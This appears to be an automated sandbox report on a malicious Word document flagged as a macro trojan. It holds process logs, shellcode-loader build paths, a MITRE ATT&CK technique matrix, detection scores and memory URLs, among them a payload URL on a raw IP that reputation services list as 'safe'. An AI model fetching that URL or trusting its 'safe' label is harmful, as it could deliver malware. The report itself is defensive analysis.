Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\MemLoader\Release-x32\MemLoader.pdb source: WINWORD.EXE, 00000000.00000000.286197791.0000000014DE0000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.304891180.00000000148D7000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.286197791.0000000014DE0000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.304891180.00000000148D7000.00000040.00000001.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\Jump to behavior
Source: WINWORD.EXE, 00000000.00000000.265780649.000000000D129000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.288935152.000000000D129000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: WINWORD.EXE, 00000000.00000000.289016717.000000000D17B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: WINWORD.EXE, 00000000.00000000.296099721.000000000B3DE000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.263614877.000000000B3DE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: WINWORD.EXE, 00000000.00000000.259111820.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.280547961.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.289832763.0000000001C20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: WINWORD.EXE, 00000000.00000000.259111820.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.280547961.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.289832763.0000000001C20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: WINWORD.EXE, 00000000.00000000.259111820.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.280547961.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.289832763.0000000001C20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: WINWORD.EXE, 00000000.00000000.259111820.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.280547961.0000000001C20000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.289832763.0000000001C20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Scripting		Path Interception2
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Non-Application Layer Protocol		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts32
Exploitation for Client Execution		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Ingress Tool Transfer		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
Scripting		NTDS2
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
valliant.document.08.11.2022.doc27%VirustotalBrowse
valliant.document.08.11.2022.doc18%ReversingLabsScript-Macro.Trojan.Amphitryon
valliant.document.08.11.2022.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://settings.outlook.comS0%Avira URL Cloudsafe
http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f71USERNAME=userUSERPROFILE=C:0%Avira URL Cloudsafe
https://api.aadrm.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/Ep0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fOOC:0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://substrate.office.comp0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/ym0%Avira URL Cloudsafe
http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f0%Avira URL Cloudsafe
https://dataservice.o365filtering.com2p70%Avira URL Cloudsafe
https://ncus.contentsync.0%URL Reputationsafe
https://substrate.office.comN0%Avira URL Cloudsafe
https://substrate.office.comV0%Avira URL Cloudsafe
https://dataservice.o365filtering.com)n00%Avira URL Cloudsafe
https://substrate.office.comW0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://globaldisco.crm.dynamics.comom0%Avira URL Cloudsafe
https://outlook.office.com&0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-ffalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://shell.suite.office.com:1443WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
    		high
    https://autodiscover-s.outlook.com/WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
      		high
      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrWINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
        		high
        https://login.windows.net/common/oauth2/authorize0_WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
          		high
          https://cdn.entity.2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
          • URL Reputation: safe
          		unknown
          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
            		high
            https://login.windows.net/common/oauth2/authorizeB%WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
              		high
              https://messaging.action.office.com/setuseraction16AWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                https://outlook.office365.com/d0WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://rpsticket.partnerservices.getmicrosoftkey.comWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://lookup.onenote.com/lookup/geolocation/v1WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                    		high
                    https://login.windows.net/common/oauth2/authorizePtWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                        		high
                        https://settings.outlook.comSWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f71USERNAME=userUSERPROFILE=C:WINWORD.EXE, 00000000.00000000.291653462.000000000DCF7000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267974065.000000000DCF7000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyWINWORD.EXE, 00000000.00000000.299025740.000000000D0BF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265671015.000000000D0BF000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                          		high
                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech)WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://api.aadrm.com/WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://dataservice.o365filtering.com/EpWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectoryTVWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesWINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                		high
                                https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppWINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.microsoftstream.com/api/2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                      		high
                                      https://cr.office.comWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                        		high
                                        https://web.microsoftstream.com/video/#rFWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://login.windows.net/common/oauth2/authorizeQuWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://tasks.office.comWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://my.microsoftpersonalcontent.comWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fOOC:WINWORD.EXE, 00000000.00000000.299992544.000000000D27B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://store.office.cn/addinstemplate2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://messaging.engagement.office.com/WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                		high
                                                https://onedrive.live.com/embed?iWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://loki.delve.office.com/api/v1/configuration/officewin32/.WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://graph.ppe.windows.net/%WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                        		high
                                                        https://www.odwebp.svc.ms2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsWINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drfalse
                                                          		high
